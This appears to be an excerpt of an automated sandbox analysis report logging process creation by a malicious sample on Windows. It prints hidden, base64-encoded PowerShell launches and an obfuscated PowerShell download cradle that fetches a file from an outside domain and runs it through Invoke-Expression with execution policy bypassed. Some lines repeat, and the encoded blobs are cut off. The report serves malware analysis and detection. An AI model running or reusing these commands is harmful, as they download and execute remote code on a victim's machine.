Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 powershell -w h -e ZgB1AG4AYwB0AGkAbwBuACAAYgBEAFgAdgBWACgAJABrAEMAcgBiAHgAKQAgAHsAcgBlAHQAdQByAG4AIABbAGMAaABhAHIAXQA6ADoAQwBvAG4AdgBlAHIAdABGAHIAbwBtAFUAdABmADMAMgAoACQAawBDAHIAYgB4ACkAfQAmACgAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADgAKQApACkAKAAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAzACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -e ZgB1AG4AYwB0AGkAbwBuACAAYgBEAFgAdgBWACgAJABrAEMAcgBiAHgAKQAgAHsAcgBlAHQAdQByAG4AIABbAGMAaABhAHIAXQA6ADoAQwBvAG4AdgBlAHIAdABGAHIAbwBtAFUAdABmADMAMgAoACQAawBDAHIAYgB4ACkAfQAmACgAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADgAKQApACkAKAAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAzACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYwApACkAKwAoAGIARAJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -C Set-Item Variable:7kM 'https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt';SI Variable:\C ([Net.WebClient]::New());Set-Variable 3h (((([Net.WebClient]::New()|Member)|Where{(Variable _ -ValueOn).Name -like'D*g'}).Name));(Variable C -Value).((Variable 3h -ValueOnl))((Item Variable:\7kM).Value)|&(GV *uti*t).Value.InvokeCommand.(((GV *uti*t).Value.InvokeCommand.PsObject.Methods|Where{(Variable _ -ValueOn).Name -like'*Co*d'}).Name)((GV *uti*t).Value.InvokeCommand.GetCommandName('*e-Ex*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet) Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 powershell -w h -e zgb1ag4aywb0agkabwbuacaaygbeafgadgbwacgajabraemacgbiahgakqagahsacgblahqadqbyag4aiabbagmaaabhahiaxqa6adoaqwbvag4adgblahiadabgahiabwbtafuadabmadmamgaoacqaawbdahiaygb4ackafqamacgakabiaeqawab2afyakaawahganga5ackakqaracgaygbeafgadgbwacgamab4adyanqapackakwaoagiarabyahyavgaoadaaeaa3adgakqapackakaaoagiarabyahyavgaoadaaeaa1admakqapacsakabiaeqawab2afyakaawahganwa0ackakqaracgaygbeafgadgbwacgamab4adyamqapackakwaoagiarabyahyavgaoadaaeaa3adiakqapacsakabiaeqawab2afyakaawahganwa0ackakqaracgaygbeafgadgbwacgamab4adiazaapackakwaoagiarabyahyavgaoadaaeaa1adaakqapacsakabiaeqawab2afyakaawahganwayackakqaracgaygbeafgadgbwacgamab4adyazgapackakwaoagiarabyahyavgaoadaaeaa2admakqapacsakabiaeqawab2afyakaawahganga1ackakqaracgaygbeafgadgbwacgamab4adcamwapackakwaoagiarabyahyavgaoadaaeaa3admakqapacsakabiaeqawab2afyakaawahgamgawackakqaracgaygbeafgadgbwacgamab4adiamgapackakwaoagiarabyahyavgaoadaaeaayadqakqapacsakabiaeqawab2afyakaawahganga1ackakqaracgaygbeafgadgbwacgamab4adyazqapackakwaoagiarabyahyavgaoadaaeaa3adyakqapacsakabiaeqawab2afyakaawahgamwbhackakqaracgaygbeafgadgbwacgamab4aduanwapackakwaoagiarabyahyavgaoadaaeaa0adkakqapacsakabiaeqawab2afyakaawahganablackakqaracgaygbeafgadgbwacgamab4adqanaapackakwaoagiarabyahyavgaoadaaeaa0adkakqapacsakabiaeqawab2afyakaawahganqayackakqaracgaygbeafgadgbwacgamab4aduaywapackakwaoagiarabyahyavgaoadaaeaa1admakqapacsakabiaeqawab2afyakaawahganwa5ackakqaracgaygbeafgadgbwacgamab4adcamwapackakwaoagiarabyahyavgaoadaaeaa1adcakqapacsakabiaeqawab2afyakaawahganabmackakqaracgaygbeafgadgbwacgamab4aduanwapackakwaoagiarabyahyavgaoadaaeaazadyakqapacsakabiaeqawab2afyakaawahgamwa0ackakqaracgaygbeafgadgbwacgamab4aduaywapackakwaoagiarabyahyavgaoadaaeaa1adcakqapacsakabiaeqawab2afyakaawahganga5ackakqaracgaygbeafgadgbwacgamab4adyazqapackakwaoagiarabyahyavgaoadaaeaa2adqakqapacsakabiaeqawab2afyakaawahgangbmackakqaracgaygbeafgadgbwacgamab4adcanwapackakwaoagiarabyahyavgaoadaaeaa3admakqapacsakabiaeqawab2afyakaawahganqawackakqaracgaygbeafgadgbwacgamab4adyazgapackakwaoagiarabyahyavgaoadaaeaa3adcakqapacsakabiaeqawab2afyakaawahganga1ackakqaracgaygbeafgadgbwacgamab4adcamgapackakwaoagiarabyahyavgaoadaaeaa1admakqapacsakabiaeqawab2afyakaawahganga4ackakqaracgaygbeafgadgbwacgamab4adyanqapackakwaoagiarabyahyavgaoadaaeaa2agmakqapacsakabiaeqawab2afyakaawahgangbjackakqaracgaygbeafgadgbwacgamab4aduaywapackakwaoagiarabyahyavgaoadaaeaa3adyakqapacsakabiaeqawab2afyakaawahgamwaxackakqaracgaygbeafgadgbwacgamab4adiazqapackakwaoagiarabyahyavgaoadaaeaazadaakqapacsakabiaeqawab2afyakaawahganqbjackakqaracgaygbeafgadgbwacgamab4adcamaapackakwaoagiarabyahyavgaoadaaeaa2agyakqapacsakabiaeqawab2afyakaawahganwa3ackakqaracgaygbeafgadgbwacgamab4adyanqapackakwaoagiarabyahyavgaoadaaeaa3adiakqapacsakabiaeqawab2afyakaawahganwazackakqaracgaygbeafgadgbwacgamab4adyaoaapackakwaoagiarabyahyavgaoadaaeaa2aduakqapacsakabiaeqawab2afyakaawahgangbjackakqaracgaygbeafgadgbwacgamab4adyay
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w h -e zgb1ag4aywb0agkabwbuacaaygbeafgadgbwacgajabraemacgbiahgakqagahsacgblahqadqbyag4aiabbagmaaabhahiaxqa6adoaqwbvag4adgblahiadabgahiabwbtafuadabmadmamgaoacqaawbdahiaygb4ackafqamacgakabiaeqawab2afyakaawahganga5ackakqaracgaygbeafgadgbwacgamab4adyanqapackakwaoagiarabyahyavgaoadaaeaa3adgakqapackakaaoagiarabyahyavgaoadaaeaa1admakqapacsakabiaeqawab2afyakaawahganwa0ackakqaracgaygbeafgadgbwacgamab4adyamqapackakwaoagiarabyahyavgaoadaaeaa3adiakqapacsakabiaeqawab2afyakaawahganwa0ackakqaracgaygbeafgadgbwacgamab4adiazaapackakwaoagiarabyahyavgaoadaaeaa1adaakqapacsakabiaeqawab2afyakaawahganwayackakqaracgaygbeafgadgbwacgamab4adyazgapackakwaoagiarabyahyavgaoadaaeaa2admakqapacsakabiaeqawab2afyakaawahganga1ackakqaracgaygbeafgadgbwacgamab4adcamwapackakwaoagiarabyahyavgaoadaaeaa3admakqapacsakabiaeqawab2afyakaawahgamgawackakqaracgaygbeafgadgbwacgamab4adiamgapackakwaoagiarabyahyavgaoadaaeaayadqakqapacsakabiaeqawab2afyakaawahganga1ackakqaracgaygbeafgadgbwacgamab4adyazqapackakwaoagiarabyahyavgaoadaaeaa3adyakqapacsakabiaeqawab2afyakaawahgamwbhackakqaracgaygbeafgadgbwacgamab4aduanwapackakwaoagiarabyahyavgaoadaaeaa0adkakqapacsakabiaeqawab2afyakaawahganablackakqaracgaygbeafgadgbwacgamab4adqanaapackakwaoagiarabyahyavgaoadaaeaa0adkakqapacsakabiaeqawab2afyakaawahganqayackakqaracgaygbeafgadgbwacgamab4aduaywapackakwaoagiarabyahyavgaoadaaeaa1admakqapacsakabiaeqawab2afyakaawahganwa5ackakqaracgaygbeafgadgbwacgamab4adcamwapackakwaoagiarabyahyavgaoadaaeaa1adcakqapacsakabiaeqawab2afyakaawahganabmackakqaracgaygbeafgadgbwacgamab4aduanwapackakwaoagiarabyahyavgaoadaaeaazadyakqapacsakabiaeqawab2afyakaawahgamwa0ackakqaracgaygbeafgadgbwacgamab4aduaywapackakwaoagiarabyahyavgaoadaaeaa1adcakqapacsakabiaeqawab2afyakaawahganga5ackakqaracgaygbeafgadgbwacgamab4adyazqapackakwaoagiarabyahyavgaoadaaeaa2adqakqapacsakabiaeqawab2afyakaawahgangbmackakqaracgaygbeafgadgbwacgamab4adcanwapackakwaoagiarabyahyavgaoadaaeaa3admakqapacsakabiaeqawab2afyakaawahganqawackakqaracgaygbeafgadgbwacgamab4adyazgapackakwaoagiarabyahyavgaoadaaeaa3adcakqapacsakabiaeqawab2afyakaawahganga1ackakqaracgaygbeafgadgbwacgamab4adcamgapackakwaoagiarabyahyavgaoadaaeaa1admakqapacsakabiaeqawab2afyakaawahganga4ackakqaracgaygbeafgadgbwacgamab4adyanqapackakwaoagiarabyahyavgaoadaaeaa2agmakqapacsakabiaeqawab2afyakaawahgangbjackakqaracgaygbeafgadgbwacgamab4aduaywapackakwaoagiarabyahyavgaoadaaeaa3adyakqapacsakabiaeqawab2afyakaawahgamwaxackakqaracgaygbeafgadgbwacgamab4adiazqapackakwaoagiarabyahyavgaoadaaeaazadaakqapacsakabiaeqawab2afyakaawahganqbjackakqaracgaygbeafgadgbwacgamab4adcamaapackakwaoagiarabyahyavgaoadaaeaa2agyakqapacsakabiaeqawab2afyakaawahganwa3ackakqaracgaygbeafgadgbwacgamab4adyanqapackakwaoagiarabyahyavgaoadaaeaa3adiakqapacsakabiaeqawab2afyakaawahganwazackakqaracgaygbeafgadgbwacgamab4adyaoaapackakwaoagiarabyahyavgaoadaaeaa2aduakqapacsakabiaeqawab2afyakaawahgangbjackakqaracgaygbeafgadgbwacgamab4adyaywapackakwaoagiara
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -nop -ex bypass -c set-item variable:7km 'https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt';si variable:\c ([net.webclient]::new());set-variable 3h (((([net.webclient]::new()|member)|where{(variable _ -valueon).name -like'd*g'}).name));(variable c -value).((variable 3h -valueonl))((item variable:\7km).value)|&(gv *uti*t).value.invokecommand.(((gv *uti*t).value.invokecommand.psobject.methods|where{(variable _ -valueon).name -like'*co*d'}).name)((gv *uti*t).value.invokecommand.getcommandname('*e-ex*',1,$true),[management.automation.commandtypes]::cmdlet)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 powershell -w h -e zgb1ag4aywb0agkabwbuacaaygbeafgadgbwacgajabraemacgbiahgakqagahsacgblahqadqbyag4aiabbagmaaabhahiaxqa6adoaqwbvag4adgblahiadabgahiabwbtafuadabmadmamgaoacqaawbdahiaygb4ackafqamacgakabiaeqawab2afyakaawahganga5ackakqaracgaygbeafgadgbwacgamab4adyanqapackakwaoagiarabyahyavgaoadaaeaa3adgakqapackakaaoagiarabyahyavgaoadaaeaa1admakqapacsakabiaeqawab2afyakaawahganwa0ackakqaracgaygbeafgadgbwacgamab4adyamqapackakwaoagiarabyahyavgaoadaaeaa3adiakqapacsakabiaeqawab2afyakaawahganwa0ackakqaracgaygbeafgadgbwacgamab4adiazaapackakwaoagiarabyahyavgaoadaaeaa1adaakqapacsakabiaeqawab2afyakaawahganwayackakqaracgaygbeafgadgbwacgamab4adyazgapackakwaoagiarabyahyavgaoadaaeaa2admakqapacsakabiaeqawab2afyakaawahganga1ackakqaracgaygbeafgadgbwacgamab4adcamwapackakwaoagiarabyahyavgaoadaaeaa3admakqapacsakabiaeqawab2afyakaawahgamgawackakqaracgaygbeafgadgbwacgamab4adiamgapackakwaoagiarabyahyavgaoadaaeaayadqakqapacsakabiaeqawab2afyakaawahganga1ackakqaracgaygbeafgadgbwacgamab4adyazqapackakwaoagiarabyahyavgaoadaaeaa3adyakqapacsakabiaeqawab2afyakaawahgamwbhackakqaracgaygbeafgadgbwacgamab4aduanwapackakwaoagiarabyahyavgaoadaaeaa0adkakqapacsakabiaeqawab2afyakaawahganablackakqaracgaygbeafgadgbwacgamab4adqanaapackakwaoagiarabyahyavgaoadaaeaa0adkakqapacsakabiaeqawab2afyakaawahganqayackakqaracgaygbeafgadgbwacgamab4aduaywapackakwaoagiarabyahyavgaoadaaeaa1admakqapacsakabiaeqawab2afyakaawahganwa5ackakqaracgaygbeafgadgbwacgamab4adcamwapackakwaoagiarabyahyavgaoadaaeaa1adcakqapacsakabiaeqawab2afyakaawahganabmackakqaracgaygbeafgadgbwacgamab4aduanwapackakwaoagiarabyahyavgaoadaaeaazadyakqapacsakabiaeqawab2afyakaawahgamwa0ackakqaracgaygbeafgadgbwacgamab4aduaywapackakwaoagiarabyahyavgaoadaaeaa1adcakqapacsakabiaeqawab2afyakaawahganga5ackakqaracgaygbeafgadgbwacgamab4adyazqapackakwaoagiarabyahyavgaoadaaeaa2adqakqapacsakabiaeqawab2afyakaawahgangbmackakqaracgaygbeafgadgbwacgamab4adcanwapackakwaoagiarabyahyavgaoadaaeaa3admakqapacsakabiaeqawab2afyakaawahganqawackakqaracgaygbeafgadgbwacgamab4adyazgapackakwaoagiarabyahyavgaoadaaeaa3adcakqapacsakabiaeqawab2afyakaawahganga1ackakqaracgaygbeafgadgbwacgamab4adcamgapackakwaoagiarabyahyavgaoadaaeaa1admakqapacsakabiaeqawab2afyakaawahganga4ackakqaracgaygbeafgadgbwacgamab4adyanqapackakwaoagiarabyahyavgaoadaaeaa2agmakqapacsakabiaeqawab2afyakaawahgangbjackakqaracgaygbeafgadgbwacgamab4aduaywapackakwaoagiarabyahyavgaoadaaeaa3adyakqapacsakabiaeqawab2afyakaawahgamwaxackakqaracgaygbeafgadgbwacgamab4adiazqapackakwaoagiarabyahyavgaoadaaeaazadaakqapacsakabiaeqawab2afyakaawahganqbjackakqaracgaygbeafgadgbwacgamab4adcamaapackakwaoagiarabyahyavgaoadaaeaa2agyakqapacsakabiaeqawab2afyakaawahganwa3ackakqaracgaygbeafgadgbwacgamab4adyanqapackakwaoagiarabyahyavgaoadaaeaa3adiakqapacsakabiaeqawab2afyakaawahganwazackakqaracgaygbeafgadgbwacgamab4adyaoaapackakwaoagiarabyahyavgaoadaaeaa2aduakqapacsakabiaeqawab2afyakaawahgangbjackakqaracgaygbeafgadgbwacgamab4adyayJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w h -e zgb1ag4aywb0agkabwbuacaaygbeafgadgbwacgajabraemacgbiahgakqagahsacgblahqadqbyag4aiabbagmaaabhahiaxqa6adoaqwbvag4adgblahiadabgahiabwbtafuadabmadmamgaoacqaawbdahiaygb4ackafqamacgakabiaeqawab2afyakaawahganga5ackakqaracgaygbeafgadgbwacgamab4adyanqapackakwaoagiarabyahyavgaoadaaeaa3adgakqapackakaaoagiarabyahyavgaoadaaeaa1admakqapacsakabiaeqawab2afyakaawahganwa0ackakqaracgaygbeafgadgbwacgamab4adyamqapackakwaoagiarabyahyavgaoadaaeaa3adiakqapacsakabiaeqawab2afyakaawahganwa0ackakqaracgaygbeafgadgbwacgamab4adiazaapackakwaoagiarabyahyavgaoadaaeaa1adaakqapacsakabiaeqawab2afyakaawahganwayackakqaracgaygbeafgadgbwacgamab4adyazgapackakwaoagiarabyahyavgaoadaaeaa2admakqapacsakabiaeqawab2afyakaawahganga1ackakqaracgaygbeafgadgbwacgamab4adcamwapackakwaoagiarabyahyavgaoadaaeaa3admakqapacsakabiaeqawab2afyakaawahgamgawackakqaracgaygbeafgadgbwacgamab4adiamgapackakwaoagiarabyahyavgaoadaaeaayadqakqapacsakabiaeqawab2afyakaawahganga1ackakqaracgaygbeafgadgbwacgamab4adyazqapackakwaoagiarabyahyavgaoadaaeaa3adyakqapacsakabiaeqawab2afyakaawahgamwbhackakqaracgaygbeafgadgbwacgamab4aduanwapackakwaoagiarabyahyavgaoadaaeaa0adkakqapacsakabiaeqawab2afyakaawahganablackakqaracgaygbeafgadgbwacgamab4adqanaapackakwaoagiarabyahyavgaoadaaeaa0adkakqapacsakabiaeqawab2afyakaawahganqayackakqaracgaygbeafgadgbwacgamab4aduaywapackakwaoagiarabyahyavgaoadaaeaa1admakqapacsakabiaeqawab2afyakaawahganwa5ackakqaracgaygbeafgadgbwacgamab4adcamwapackakwaoagiarabyahyavgaoadaaeaa1adcakqapacsakabiaeqawab2afyakaawahganabmackakqaracgaygbeafgadgbwacgamab4aduanwapackakwaoagiarabyahyavgaoadaaeaazadyakqapacsakabiaeqawab2afyakaawahgamwa0ackakqaracgaygbeafgadgbwacgamab4aduaywapackakwaoagiarabyahyavgaoadaaeaa1adcakqapacsakabiaeqawab2afyakaawahganga5ackakqaracgaygbeafgadgbwacgamab4adyazqapackakwaoagiarabyahyavgaoadaaeaa2adqakqapacsakabiaeqawab2afyakaawahgangbmackakqaracgaygbeafgadgbwacgamab4adcanwapackakwaoagiarabyahyavgaoadaaeaa3admakqapacsakabiaeqawab2afyakaawahganqawackakqaracgaygbeafgadgbwacgamab4adyazgapackakwaoagiarabyahyavgaoadaaeaa3adcakqapacsakabiaeqawab2afyakaawahganga1ackakqaracgaygbeafgadgbwacgamab4adcamgapackakwaoagiarabyahyavgaoadaaeaa1admakqapacsakabiaeqawab2afyakaawahganga4ackakqaracgaygbeafgadgbwacgamab4adyanqapackakwaoagiarabyahyavgaoadaaeaa2agmakqapacsakabiaeqawab2afyakaawahgangbjackakqaracgaygbeafgadgbwacgamab4aduaywapackakwaoagiarabyahyavgaoadaaeaa3adyakqapacsakabiaeqawab2afyakaawahgamwaxackakqaracgaygbeafgadgbwacgamab4adiazqapackakwaoagiarabyahyavgaoadaaeaazadaakqapacsakabiaeqawab2afyakaawahganqbjackakqaracgaygbeafgadgbwacgamab4adcamaapackakwaoagiarabyahyavgaoadaaeaa2agyakqapacsakabiaeqawab2afyakaawahganwa3ackakqaracgaygbeafgadgbwacgamab4adyanqapackakwaoagiarabyahyavgaoadaaeaa3adiakqapacsakabiaeqawab2afyakaawahganwazackakqaracgaygbeafgadgbwacgamab4adyaoaapackakwaoagiarabyahyavgaoadaaeaa2aduakqapacsakabiaeqawab2afyakaawahgangbjackakqaracgaygbeafgadgbwacgamab4adyaywapackakwaoagiaraJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -nop -ex bypass -c set-item variable:7km 'https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt';si variable:\c ([net.webclient]::new());set-variable 3h (((([net.webclient]::new()|member)|where{(variable _ -valueon).name -like'd*g'}).name));(variable c -value).((variable 3h -valueonl))((item variable:\7km).value)|&(gv *uti*t).value.invokecommand.(((gv *uti*t).value.invokecommand.psobject.methods|where{(variable _ -valueon).name -like'*co*d'}).name)((gv *uti*t).value.invokecommand.getcommandname('*e-ex*',1,$true),[management.automation.commandtypes]::cmdlet) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
